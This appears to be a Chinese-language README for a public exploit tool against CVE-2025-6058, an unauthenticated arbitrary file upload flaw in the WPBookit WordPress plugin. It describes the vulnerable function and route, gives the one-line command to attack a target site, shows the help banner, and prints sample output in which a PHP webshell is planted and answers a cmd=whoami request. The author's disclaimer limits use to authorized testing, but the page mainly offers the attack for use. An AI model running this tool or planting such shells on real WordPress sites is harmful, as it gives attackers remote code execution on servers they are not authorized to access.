⚡ WPBookit <= 1.0.4 - 未授权任意文件上传
📝 描述
WordPress的WPBookit插件在所有版本(包括1.0.4)中,由于image_upload_handle()函数缺少文件类型验证,该函数通过add_booking_type路由挂接,导致存在任意文件上传漏洞。
此漏洞允许未授权攻击者向受影响站点的服务器上传任意文件,可能导致远程代码执行。
| CVE |
CVSS 评分 |
公开发布日期 |
最后更新日期 |
| CVE-2025-6058 |
9.8(严重) |
2025年7月11日 |
2025年7月12日 |
🚀 此漏洞利用工具的功能
此漏洞利用工具自动化以下过程:
- 检测目标是否运行易受攻击的WPBookit版本(<= 1.0.4)
- 使用易受攻击的路由上传PHP shell,无需身份验证
- 确认shell上传并提供其确切路径以进行远程命令执行
🛠️ 使用方法
1
|
python3 CVE-2025-6058.py -u http://target.com/wordpress
|
🖥️ 示例
1
|
python3 CVE-2025-6058.py -u http://target.com/wordpress
|
🆘 帮助与横幅示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
python CVE-2025-6058.py -help
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
usage: CVE-2025-6058.py [-h] -u URL
CVE-2025-6058 WPBookit <= 1.0.4 - 未授权任意文件上传 | by Khaled Alenazi (Nxploited)
options:
-h, --help 显示此帮助信息并退出
-u, --url URL 目标URL,例如 http(s)://target.com/wordpress
|
📤 输出
1
2
3
4
5
|
[*] 检查插件版本 ...
[*] 利用文件上传 ...
[+] 利用成功!
[+] Shell路径:wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
|
⚠️ 免责声明
此工具仅用于教育和授权的安全测试目的。
作者不对任何滥用或未经授权的活动负责。
使用风险自负,并始终确保您有权限测试目标系统。
作者:Khaled Alenazi (Nxploited)